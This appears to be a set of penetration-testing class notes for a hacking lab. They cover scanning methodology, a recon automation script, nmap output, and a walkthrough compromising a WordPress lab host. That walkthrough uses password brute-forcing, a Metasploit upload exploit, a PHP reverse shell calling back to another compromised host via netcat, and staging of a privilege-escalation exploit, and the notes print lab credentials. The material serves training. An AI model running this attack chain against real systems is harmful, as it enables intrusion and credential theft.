· 6 years ago · Nov 07, 2019, 12:10 AM
1The purpose of this class is to help students learn how to address the common issues in Hacking Challenge Lab courses.
2
3
4Issue 1. Lack of a thorough attack process
5==========================================
6 - Host discovery
7 - Service discovery
8 - Service version discovery
9 - Vulnerability research
10 - Linux (port 111)/Window (port 445) Enumeration
11 - Webserver vulnerability scan
12 - Directory brute force every webserver
13 - Analyze source code of every web app (look for IPs, usernames/passwords, explanations of how stuff works)
14 - Brute force all services
15
16
17Issue 2. Lack of automation of the process
18==========================================
19 - Research attacks scripts on the internet to enhance your methodology
20
21
22Issue 3. Failing to document all steps being performed and their output
23=======================================================================
24
25
26Issue 4. Lack of sleep during the exam
27======================================
28
29
30Issue 5. Failing to reboot target machines prior to attack
31==========================================================
32
33
34
35--------------------------------------------------------------------------------------------------------------
36
37
38A good strategy to use to prepare would be:
39
40Step 1. Ensure that you are comfortable with Linux
41--------------------------------------------------
42- LinuxSurvival.com (you should be able to comfortably pass all 4 quizzes)
43- Comptia Linux+ (You should be just a hair under a Linux system administrator in skill level, simple shell scripting, and well beyond a Linux user skill level)
44
45You should be very comfortable with the material covered in the videos below (Go through all of them twice if you are new to Linux):
46https://www.youtube.com/playlist?list=PLCDA423AB5CEC8FDB
47https://www.youtube.com/playlist?list=PLtK75qxsQaMLZSo7KL-PmiRarU7hrpnwK
48https://www.youtube.com/playlist?list=PLcUid3OP_4OXOUqYTDGjq-iEwtBf-3l2E
49
50
51
522. You should be comfortable with the following tools:
53------------------------------------------------------
54
55Nmap:
56https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBsINfLVidNVaZ-7_v1NJIo
57
58Metasploit:
59https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBmwvjJoWhM4Lg5MceSbsja
60
61Burp Suite:
62https://www.youtube.com/playlist?list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
63
64Sqlmap:
65https://www.youtube.com/playlist?list=PLA3E1E7A07FD60C75
66
67Nikto:
68https://www.youtube.com/watch?v=GH9qn_DBzCk
69
70Enum4Linux:
71https://www.youtube.com/watch?v=hA5raaGOQKQ
72
73RPCINFO/SHOWMOUNT:
74https://www.youtube.com/watch?v=FlRAA-1UXWQ
75
76Hydra:
77https://www.youtube.com/watch?v=rLtj8tEmGso
78
79
80
813. You need to comfortable with basic exploit development
82---------------------------------------------------------
83
84Basic assembly:
85https://www.youtube.com/playlist?list=PLue5IPmkmZ-P1pDbF3vSQtuNquX0SZHpB
86
87Basic exploit development (first 5 videos in the playlist):
88https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl
89
90
914. You need to be comfortable with privilege escalation
92-------------------------------------------------------
93Linux
94https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
95
96Windows
97https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
98http://www.fuzzysecurity.com/tutorials/16.html
99
100
101
102
103 #################################
104----------- ############### # Day 1: Advanced Scanning Labs # ############### -----------
105 #################################
106
107
108########################
109# Scanning Methodology #
110########################
111
112- Ping Sweep
113What's alive?
114------------
115
116---------------------------Type This-----------------------------------
117sudo nmap -sP 157.166.226.*
118
119-----------------------------------------------------------------------
120
121
122
123 -if -SP yields no results try:
124---------------------------Type This-----------------------------------
125sudo nmap -sL 157.166.226.*
126
127-----------------------------------------------------------------------
128
129
130
131 -Look for hostnames:
132---------------------------Type This-----------------------------------
133sudo nmap -sL 157.166.226.* | grep com
134
135-----------------------------------------------------------------------
136
137
138
139- Port Scan
140What's where?
141------------
142---------------------------Type This-----------------------------------
143sudo nmap -sS 162.243.126.247
144
145-----------------------------------------------------------------------
146
147
148
149- Bannergrab/Version Query
150What versions of software are running
151-------------------------------------
152
153---------------------------Type This-----------------------------------
154sudo nmap -sV 162.243.126.247
155
156-----------------------------------------------------------------------
157
158
159
160
161- Vulnerability Research
162Lookup the banner versions for public exploits
163----------------------------------------------
164http://exploit-db.com
165http://securityfocus.com/bid
166https://packetstormsecurity.com/files/tags/exploit/
167
168
169
170
171
172-----------------------------------------------------------------------------------------------------------------------------
173-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
174-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
175--------------------------------------------------------------------------------------
176Some tools to install:
177---------------------------Type This-----------------------------------
178wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
179gcc propecia.c -o propecia
180sudo cp propecia /bin
181-----------------------------------------------------------------------
182
183
184
185
186
187
188
189- I prefer to use Putty to SSH into my Linux host.
190- You can download Putty from here:
191- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
192
193Here is the information to put into putty
194
195
196ip address: 149.28.201.171
197username: labpentest
198password: lab!network@attack!
199
200
201
202##############################
203# Scanning Process to follow #
204##############################
205
206Step 1: Host Discovery
207----------------------
208
209---------------------------Type This-----------------------------------
210nmap -sP 172.31.2.0/24
211
212nmap -sL 172.31.2.0/24
213
214nmap -sS --open -p 22,445 172.31.2.0/24
215
216propecia 172.31.2 22 > file1
217propecia 172.31.2 445 > file2
218cat file1 file2 > file3
219cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
220cat lab.txt
221-----------------------------------------------------------------------
222
223
224Step 2: Port Scan
225-----------------
226nmap -sS <IP-ADDRESS>
227nmap -sU -p 69,161 <IP-ADDRESS>
228
229
230---------------------------Type This-----------------------------------
231sudo nmap -sS 172.31.2.0/24
232sudo nmap -sU -p 69,161 172.31.2.0/24
233-----------------------------------------------------------------------
234
235
236Step 3: Bannergrab
237------------------
238nmap -sV <IP-ADDRESS>
239nmap -sV -p- <IP-ADDRESS>
240 |
241 ----> Vulnerability Research
242
243---------------------------Type This-----------------------------------
244sudo nmap -sV 172.31.2.0/24
245-----------------------------------------------------------------------
246
247
248
249
250Step 4: Enumerate common Windows/Linux file sharing services
251Step 3 is where most people STOP, and you need to move on and look deeper
252------------------------------------------------------------
253
254---------------------------Type This-----------------------------------
255sudo apt install smbclient libnss-winbind winbind
256git clone https://github.com/portcullislabs/enum4linux.git
257cd enum4linux/
258perl enum4linux.pl -U 172.31.2.11
259
260nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 172.31.2.86
261---------------------------------------------------------------------------------------
262
263
264
265Step 5: Vulnerability Scan the webservers
266-----------------------------------------
267git clone https://github.com/sullo/nikto.git Nikto2
268
269cd Nikto2/program
270
271perl nikto.pl -h <IP-ADDRESS>
272
273
274
275Step 6: Directory Bruteforce every webserver
276--------------------------------------------
277sudo apt install -y libcurl4-openssl-dev
278
279git clone https://github.com/v0re/dirb.git
280
281cd dirb/
282
283./configure
284
285make
286
287./dirb
288
289./dirb http://<IP-ADDRESS> wordlists/big.txt
290
291
292
293
294
295Step 7: Analyze source code of all webpages found
296-------------------------------------------------
297lynx -dump "http://<IP-ADDRESS>" | grep -o "http:.*" > links
298
299If you ever need to download an entire Web site, perhaps for off-line viewing, wget can do the job—for example:
300
301$ wget \
302 --recursive \
303 --no-clobber \
304 --page-requisites \
305 --html-extension \
306 --convert-links \
307 --restrict-file-names=windows \
308 --domains website.org \
309 --no-parent \
310 www.website.org/tutorials/html/
311
312
313This command downloads the Web site www.website.org/tutorials/html/.
314
315The options are:
316
317--recursive: download the entire Web site.
318
319--domains website.org: don't follow links outside website.org.
320
321--no-parent: don't follow links outside the directory tutorials/html/.
322
323--page-requisites: get all the elements that compose the page (images, CSS and so on).
324
325--html-extension: save files with the .html extension.
326
327--convert-links: convert links so that they work locally, off-line.
328
329--restrict-file-names=windows: modify filenames so that they will work in Windows as well.
330
331--no-clobber: don't overwrite any existing files (used in case the download is interrupted and resumed).
332
333
334
335Step 8: Bruteforce any services you find
336----------------------------------------
337sudo apt install -y zlib1g-dev libssl-dev libidn11-dev libcurses-ocaml-dev libpcre3-dev libpq-dev libsvn-dev libssh-dev libmysqlclient-dev libpq-dev libsvn-devcd ~/toolz
338git clone https://github.com/vanhauser-thc/thc-hydra.git
339cd thc-hydra
340./configure
341make
342hydra -L username.txt -P passlist.txt ftp://<IP-ADDRESS
343hydra -l user -P passlist.txt ftp://<IP-ADDRESS
344
345
346
347##################
348# Host Discovery #
349##################
350
351Reason:
352-------
353You have to discover the reachable hosts in the network before you can attack them.
354
355
356Hosts discovery syntax:
357-----------------------
358 nmap -sP 172.31.2.0/24
359 propecia 172.31.2 22 > file1
360 propecia 172.31.2 445 > file2
361 cat file1 file2 > file3
362 cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
363 cat lab.txt
364
365Issues:
366-------
367Issue we had to deal with was hosts that didn't respond to ICMP
368
369
370 Hosts discovered:
371 -----------------
372 172.31.2.11
373 172.31.2.14
374 172.31.2.47
375 172.31.2.64
376 172.31.2.86
377 172.31.2.117
378 172.31.2.157
379 172.31.2.217
380 172.31.2.238
381
382
383
384
385
386
387#####################
388# Service Discovery #
389#####################
390
391Reason:
392-------
393Identifying what services are running on what hosts allows for you to map the network topology.
394
395
396
397Port Scan syntax:
398 sudo nmap -sS -Pn -iL lab.txt
399 sudo nmap -sU -p69,161 -Pn -iL lab.txt
400
401
402
403Services discovered:
404--------------------
405
406joe@metasploit-box:~$ sudo nmap -sS -Pn -iL lab.txt
407
408Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:52 UTC
409Nmap scan report for 172.31.2.11
410Host is up (0.087s latency).
411Not shown: 995 filtered ports
412PORT STATE SERVICE
41321/tcp open ftp
414139/tcp open netbios-ssn
415445/tcp open microsoft-ds
4163389/tcp open ms-wbt-server
4179999/tcp open abyss
418
419Nmap scan report for 172.31.2.11
420Host is up.
421
422PORT STATE SERVICE
42369/udp open|filtered tftp
424161/udp open|filtered snmp
425
426
427Nmap scan report for 172.31.2.14
428Host is up (0.087s latency).
429Not shown: 995 filtered ports
430PORT STATE SERVICE
43121/tcp open ftp
432139/tcp open netbios-ssn
433445/tcp open microsoft-ds
4343389/tcp open ms-wbt-server
4359999/tcp open abyss
436
437
438Nmap scan report for 172.31.2.14
439Host is up.
440
441PORT STATE SERVICE
44269/udp open|filtered tftp
443161/udp open|filtered snmp
444
445
446Nmap scan report for 172.31.2.47
447Host is up (0.086s latency).
448Not shown: 998 closed ports
449PORT STATE SERVICE
45022/tcp open ssh
45180/tcp open http
452
453Nmap scan report for 172.31.2.64
454Host is up (0.087s latency).
455Not shown: 997 closed ports
456PORT STATE SERVICE
45722/tcp open ssh
45880/tcp open http
4596667/tcp open irc
460
461Nmap scan report for 172.31.2.86
462Host is up (0.086s latency).
463Not shown: 989 closed ports
464PORT STATE SERVICE
46522/tcp open ssh
46653/tcp open domain
46780/tcp open http
468110/tcp open pop3
469111/tcp open rpcbind
470139/tcp open netbios-ssn
471143/tcp open imap
472445/tcp open microsoft-ds
473993/tcp open imaps
474995/tcp open pop3s
4758080/tcp open http-proxy
476
477Nmap scan report for 172.31.2.117
478Host is up (0.087s latency).
479Not shown: 997 closed ports
480PORT STATE SERVICE
48122/tcp open ssh
48280/tcp open http
4832020/tcp open xinupageserver
484
485Nmap scan report for 172.31.2.157
486Host is up (0.087s latency).
487Not shown: 997 closed ports
488PORT STATE SERVICE
48921/tcp open ftp
49022/tcp open ssh
49180/tcp open http
492
493Nmap scan report for 172.31.2.217
494Host is up (0.087s latency).
495Not shown: 997 closed ports
496PORT STATE SERVICE
49722/tcp open ssh
49880/tcp open http
4993260/tcp open iscsi
500
501Nmap scan report for 172.31.2.238
502Host is up (0.087s latency).
503Not shown: 997 closed ports
504PORT STATE SERVICE
50522/tcp open ssh
50680/tcp open http
5076969/tcp open acmsoda
508
509Nmap done: 9 IP addresses (9 hosts up) scanned in 14.82 seconds
510
511
512
513
514
515
516
517
518
519##############################################
520# Service Version Discovery (Bannergrabbing) #
521##############################################
522Reason:
523-------
524Identifying what versions of services are running on what hosts allows for you to determine if the hosts are vulnerable to attack.
525
526
527
528Port Scan syntax:
529
530joe@metasploit-box:~$ sudo nmap -sV -Pn -iL lab.txt
531
532Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:56 UTC
533Nmap scan report for 172.31.2.11
534Host is up (0.087s latency).
535Not shown: 995 filtered ports
536PORT STATE SERVICE VERSION
53721/tcp open ftp FreeFloat ftpd 1.00
538139/tcp open netbios-ssn Microsoft Windows netbios-ssn
539445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
5403389/tcp open ms-wbt-server Microsoft Terminal Service
5419999/tcp open abyss?
542Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
543
544Nmap scan report for 172.31.2.14
545Host is up (0.087s latency).
546Not shown: 995 filtered ports
547PORT STATE SERVICE VERSION
54821/tcp open ftp FreeFloat ftpd 1.00
549139/tcp open netbios-ssn Microsoft Windows netbios-ssn
550445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
5513389/tcp open ms-wbt-server Microsoft Terminal Service
5529999/tcp open abyss?
553Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
554
555Nmap scan report for 172.31.2.47
556Host is up (0.087s latency).
557Not shown: 998 closed ports
558PORT STATE SERVICE VERSION
55922/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
56080/tcp open http Apache httpd 2.2.22 ((Ubuntu))
561Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
562
563Nmap scan report for 172.31.2.64
564Host is up (0.087s latency).
565Not shown: 997 closed ports
566PORT STATE SERVICE VERSION
56722/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
56880/tcp open http Apache httpd 2.4.7 ((Ubuntu))
5696667/tcp open irc ngircd
570Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
571
572Nmap scan report for 172.31.2.86
573Host is up (0.087s latency).
574Not shown: 989 closed ports
575PORT STATE SERVICE VERSION
57622/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
57753/tcp open domain ISC BIND 9.9.5-3 (Ubuntu Linux)
57880/tcp open http Apache httpd 2.4.7 ((Ubuntu))
579110/tcp open pop3 Dovecot pop3d
580111/tcp open rpcbind 2-4 (RPC #100000)
581139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
582143/tcp open imap Dovecot imapd (Ubuntu)
583445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
584993/tcp open ssl/imap Dovecot imapd (Ubuntu)
585995/tcp open ssl/pop3 Dovecot pop3d
5868080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
587Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel, cpe:/o:campmoca;:ubuntu_linux
588
589Nmap scan report for 172.31.2.117
590Host is up (0.086s latency).
591Not shown: 997 closed ports
592PORT STATE SERVICE VERSION
59322/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
59480/tcp open http Apache httpd 2.4.7 ((Ubuntu))
5952020/tcp open ftp vsftpd 2.0.8 or later
596Service Info: Host: minotaur; OS: Linux; CPE: cpe:/o:linux:linux_kernel
597
598Nmap scan report for 172.31.2.157
599Host is up (0.086s latency).
600Not shown: 997 closed ports
601PORT STATE SERVICE VERSION
60221/tcp open ftp vsftpd 2.0.8 or later
60322/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
60480/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
605
606Nmap scan report for 172.31.2.217
607Host is up (0.087s latency).
608Not shown: 997 closed ports
609PORT STATE SERVICE VERSION
61022/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
61180/tcp open http nginx
6123260/tcp open iscsi?
613Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
614
615Nmap scan report for 172.31.2.238
616Host is up (0.087s latency).
617Not shown: 997 closed ports
618PORT STATE SERVICE VERSION
61922/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
62080/tcp open http nginx 1.6.2
6216969/tcp open acmsoda?
622Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
623
624Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
625Nmap done: 9 IP addresses (9 hosts up) scanned in 170.68 seconds
626
627
628
629
630
631
632
633-----------------------------------------------------------------------------------------------------------------------------
634-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
635-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
636--------------------------------------------------------------------------------------
637
638#!/bin/bash
639
640# Script made during the CyberWar class for the students to play with, debug, and improve.
641# Take a look at the following websites for ideas:
642# https://github.com/commonexploits/port-scan-automation
643# https://www.commonexploits.com/penetration-testing-scripts/
644# https://github.com/averagesecurityguy/scripts
645# https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
646
647
648
649# Some thoughts of things to add to this script:
650# Shodan queries (API key)
651# AWS scanning (need credentials)
652# Jenkins scanning
653# Active Directory enumeration
654# Github scanning (API key required)
655# Blockchain platforms
656
657
658
659
660
661
662
663#############################################
664# Check to see if script is running as root #
665#############################################
666if [ "$EUID" -ne 0 ]
667 then echo "Please run as root"
668 exit
669fi
670
671
672####################################
673# Check to see if gcc is installed #
674####################################
675file1="/usr/bin/gcc"
676if [ -f "$file1" ]
677then
678 echo "$file is installed."
679 clear
680else
681 echo "$file not found."
682 echo Installing gcc
683 apt-get install -y gcc
684 clear
685fi
686
687########################
688# Make the directories #
689########################
690cd /tmp
691rm -rf customerAudit/
692rm -rf NetworkAudit/
693mkdir -p /tmp/NetworkAudit/discovered_services/
694mkdir -p /tmp/NetworkAudit/scan/windows/
695mkdir -p /tmp/NetworkAudit/scan/sunrpc/
696mkdir -p /tmp/NetworkAudit/scan/ssh/
697mkdir -p /tmp/NetworkAudit/scan/ftp/
698mkdir -p /tmp/NetworkAudit/scan/http/
699mkdir -p /tmp/NetworkAudit/scan/telnet/
700mkdir -p /tmp/NetworkAudit/scan/pop3/
701mkdir -p /tmp/NetworkAudit/scan/printers/
702mkdir -p /tmp/NetworkAudit/scan/mssql_databases/
703mkdir -p /tmp/NetworkAudit/scan/oracle_databases/
704mkdir -p /tmp/NetworkAudit/scan/mysql_databases/
705mkdir -p /tmp/NetworkAudit/scan/mongodb_databases/
706
707
708#####################
709# Download propecia #
710#####################
711file2="/bin/propecia"
712if [ -f "$file2" ]
713then
714 echo "$file is installed."
715 clear
716else
717 echo "$file not found."
718 echo Installing propecia
719 cd /tmp
720 wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
721 gcc propecia.c -o propecia
722 cp propecia /bin
723fi
724
725######################
726# Find Windows Hosts #
727######################
728clear
729echo "Scanning for windows hosts."
730propecia 172.31.2 445 >> /tmp/NetworkAudit/discovered_services/windows_hosts
731clear
732echo "Done scanning for windows hosts. FTP is next."
733
734
735##################
736# Find FTP Hosts #
737##################
738echo "Scanning for hosts running FTP."
739propecia 172.31.2 21 >> /tmp/NetworkAudit/discovered_services/ftp_hosts
740clear
741echo "Done scanning for FTP hosts. SSH is next."
742
743##################
744# Find SSH Hosts #
745##################
746echo "Scanning for hosts running SSH."
747propecia 172.31.2 22 >> /tmp/NetworkAudit/discovered_services/ssh_hosts
748clear
749echo "Done scanning for SSH hosts. POP3 is next."
750
751
752###################
753# Find POP3 Hosts #
754###################
755echo "Scanning for hosts running POP3."
756propecia 172.31.2 110 >> /tmp/NetworkAudit/discovered_services/pop3_hosts
757clear
758echo "Done scanning for POP3 hosts. SunRPC is next."
759
760
761#####################
762# Find SunRPC Hosts #
763#####################
764echo "Scanning for hosts running SunRPC."
765propecia 172.31.2 111 >> /tmp/NetworkAudit/discovered_services/sunrpc_hosts
766clear
767echo "Done scanning for SunRPC hosts. Telnet is next."
768
769
770#####################
771# Find Telnet Hosts #
772#####################
773echo "Scanning for hosts running Telnet."
774propecia 172.31.2 23 >> /tmp/NetworkAudit/discovered_services/telnet_hosts
775clear
776echo "Done scanning for Telnet hosts. HTTP is next."
777
778
779###################
780# Find HTTP Hosts #
781###################
782echo "Scanning for hosts running HTTP"
783propecia 172.31.2 80 >> /tmp/NetworkAudit/discovered_services/http_hosts
784clear
785echo "Done scanning for HTTP hosts. HTTPS hosts are next."
786
787
788###################
789# Find HTTPS Hosts #
790###################
791echo "Scanning for hosts running HTTP"
792propecia 172.31.2 443 >> /tmp/NetworkAudit/discovered_services/https_hosts
793clear
794echo "Done scanning for HTTPS hosts. Databases are next."
795
796
797##################
798# Find Databases #
799##################
800echo "Scanning for hosts running MS SQL Server"
801propecia 172.31.2 1433 >> /tmp/NetworkAudit/discovered_services/mssql_hosts
802clear
803
804echo "Scanning for hosts running Oracle"
805propecia 172.31.2 1521 >> /tmp/NetworkAudit/discovered_services/oracle_hosts
806clear
807
808echo "Scanning for hosts running Postgres"
809propecia 172.31.2 5432 >> /tmp/NetworkAudit/discovered_services/postgres_hosts
810clear
811
812echo "Scanning for hosts running MongoDB"
813propecia 172.31.2 27017 >> /tmp/NetworkAudit/discovered_services/mongodb_hosts
814clear
815
816echo "Scanning for hosts running MySQL"
817propecia 172.31.2 3306 >> /tmp/NetworkAudit/discovered_services/mysql_hosts
818clear
819echo "Done doing the host discovery. Moving on to nmap'ing each host discovered. Windows hosts are first."
820
821
822###############################
823# Ok, let's do the NMAP files #
824###############################
825clear
826# Windows
827for x in `cat /tmp/NetworkAudit/discovered_services/windows_hosts` ; do nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect $x > /tmp/NetworkAudit/scan/windows/$x ; done
828echo "Done with Windows."
829
830clear
831# FTP
832for x in `cat /tmp/NetworkAudit/discovered_services/ftp_hosts` ; do nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor $x > /tmp/NetworkAudit/scan/ftp/$x ; done
833echo "Done with FTP."
834
835clear
836# SSH
837for x in `cat /tmp/NetworkAudit/discovered_services/ssh_hosts` ; do nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos $x > /tmp/NetworkAudit/scan/ssh/$x ; done
838echo "Done with SSH."
839
840clear
841# SUNRPC
842for x in `cat /tmp/NetworkAudit/discovered_services/sunrpc_hosts` ; do nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo $x > /tmp/NetworkAudit/scan/sunrpc/$x ; done
843echo "Done with SunRPC."
844
845clear
846# POP3
847for x in `cat /tmp/NetworkAudit/discovered_services/pop3_hosts` ; do nmap -Pn -n --open -p110 --script=banner,pop3-capabilities,pop3-ntlm-info,ssl*,tls-nextprotoneg $x > /tmp/NetworkAudit/scan/pop3/$x ; done
848echo "Done with POP3."
849
850# clear
851# HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
852# as a good reference for what nmap nse scripts to run against port 80 and 443
853# for x in `cat /tmp/NetworkAudit/discovered_services/http_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
854# echo "Done with HTTP."
855
856
857# clear
858# HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
859# as a good reference for what nmap nse scripts to run against port 80 and 443
860# for x in `cat /tmp/NetworkAudit/discovered_services/https_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
861# echo "Done with HTTP."
862
863
864clear
865# SQL Servers
866for x in `cat /tmp/NetworkAudit/discovered_services/mssql_hosts` ; do -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info $x > /tmp/NetworkAudit/scan/mssql_databases/$x ; done
867echo "Done with MS SQL."
868
869clear
870# Oracle Servers
871# FIX THIS: needs brute force wordlists for this to run correctly
872# for x in `cat /tmp/NetworkAudit/discovered_services/oracle_hosts` ; do nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt $x >> /tmp/NetworkAudit/scan/oracle_databases/$x ; done
873# echo "Done with Oracle."
874
875clear
876# MongoDB
877for x in `cat /tmp/NetworkAudit/discovered_services/mongodb_hosts` ; do nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info $x > /tmp/NetworkAudit/scan/mongodb_databases/$x ; done
878echo "Done with MongoDB."
879
880
881clear
882# MySQL Servers
883for x in `cat /tmp/NetworkAudit/discovered_services/mysql_hosts` ; do nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables $x >> /tmp/NetworkAudit/scan/mysql_databases/$x ; done
884echo "Done with MySQL."
885
886
887# Add postgres nse scripts
888# References:
889# https://nmap.org/nsedoc/lib/pgsql.html
890# https://nmap.org/nsedoc/scripts/pgsql-brute.html
891#
892
893echo " "
894echo " "
895sleep 1
896clear
897echo "Done, now check your results."
898sleep 2
899clear
900cd /tmp/NetworkAudit/scan/
901ls
902
903
904
905----------------------------------------------------------------------------------------------------------------------------
906-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
907-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
908--------------------------------------------------------------------------------------
909
910 ######################################
911----------- ############### # Day 2: Attacking Hosts in the lab ################ -----------
912 ######################################
913
914######################
915# Attacking Minotaur #
916######################
917
918Step 1: Portscan/Bannergrab the target host
919---------------------------Type This-----------------------------------
920sudo nmap -sV 172.31.2.117
921-----------------------------------------------------------------------
922
923
924
925Step 2: Vulnerability scan the web server
926---------------------------Type This-----------------------------------
927nikto.pl -h 172.31.2.117
928-----------------------------------------------------------------------
929
930
931
932Step 3: Directory brute-force the webserver
933---------------------------Type This-----------------------------------
934dirb http://172.31.2.117 /usr/share/dirb/wordlists/big.txt
935-----------------------------------------------------------------------
936
937### dirb output ###
938==> DIRECTORY: http://172.31.2.117/bull/
939-----------------------------------------------------------------------
940
941
942Step 4: Run wordpress vulnerability scanner
943---------------------------Type This-----------------------------------
944wpscan --url 172.31.2.117/bull/ -r --enumerate u --enumerate p --enumerate t --enumerate tt
945
946
947cewl -w words.txt http://172.31.2.117/bull/
948
949
950cewl http://172.31.2.117/bull/ -d 1 -m 6 -w whateverbro.txt
951
952wc -l whateverbro.txt
953
954john --wordlist=whateverbro.txt --rules --stdout > words-john.txt
955
956wc -l words-john.txt
957
958wpscan --username bully --url http://172.31.2.117/bull/ --wordlist words-john.txt --threads 10
959-----------------------------------------------------------------------
960
961
962
963
964
965Step 5: Attack vulnerable Wordpress plugin with Metasploit (just doing the exact same attack with MSF)
966---------------------------Type This-----------------------------------
967msfconsole
968
969use exploit/unix/webapp/wp_slideshowgallery_upload
970
971set RHOST 172.31.2.117
972
973set RPORT 80
974
975set TARGETURI /bull
976
977set WP_USER bully
978
979set WP_PASSWORD Bighornedbulls
980
981exploit
982-----------------------------------------------------------------------
983
984Damn...that didn't work...Can't reverse shell from inside the network to a host in the VPN network range.
985This is a lab limitation that I implemented to stop students from compromising hosts in the lab network
986and then from the lab network attacking other students.
987
988
989---------------------------Type This-----------------------------------
990wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
991
992tar -zxvf php-reverse-shell-1.0.tar.gz
993
994cd ~/toolz/php-reverse-shell-1.0/
995
996nano php-reverse-shell.php
997-----------------------------------------------------------------------
998 ***** change the $ip and $port variables to a host that you have already compromised in the network
999 ***** for this example I chose 172.31.2.64 and kept port 1234
1000
1001
1002---------------------------Type This-----------------------------------
1003chmod 777 php-reverse-shell.php
1004cp php-reverse-shell.php ..
1005-----------------------------------------------------------------------
1006
1007
1008
1009Browse to this link https://www.exploit-db.com/raw/34681/ and copy all of the text from it.
1010Paste the contents of this link into a file called wp_gallery_slideshow_146_suv.py
1011--------------------------Type This-----------------------------------
1012python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php
1013
1014-----------------------------------------------------------------------
1015
1016
1017
1018Set up netcat listener on previously compromised host
1019---------------------------Type This-----------------------------------
1020ssh -l webmin 172.31.2.64
1021 webmin1980
1022
1023
1024nc -lvp 1234
1025-----------------------------------------------------------------------
1026
1027
1028
1029
1030---------------------Type This in your browser ------------------------
1031http://172.31.2.117/bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php
1032-----------------------------------------------------------------------
1033
1034
1035Now check your listener to see if you got the connection
1036---------------------------Type This-----------------------------------
1037id
1038
1039/sbin/ifconfig
1040
1041python -c 'import pty;pty.spawn("/bin/bash")'
1042
1043---------------------------Type This-----------------------------------
1044cd /tmp
1045cat >> exploit2.c << out
1046-----------------------------------------------------------------------
1047**************paste in the content from here *****************
1048https://www.exploit-db.com/raw/37292/
1049
1050**************hit enter a few times *****************
1051
1052---------------------------Type This-----------------------------------
1053out
1054
1055
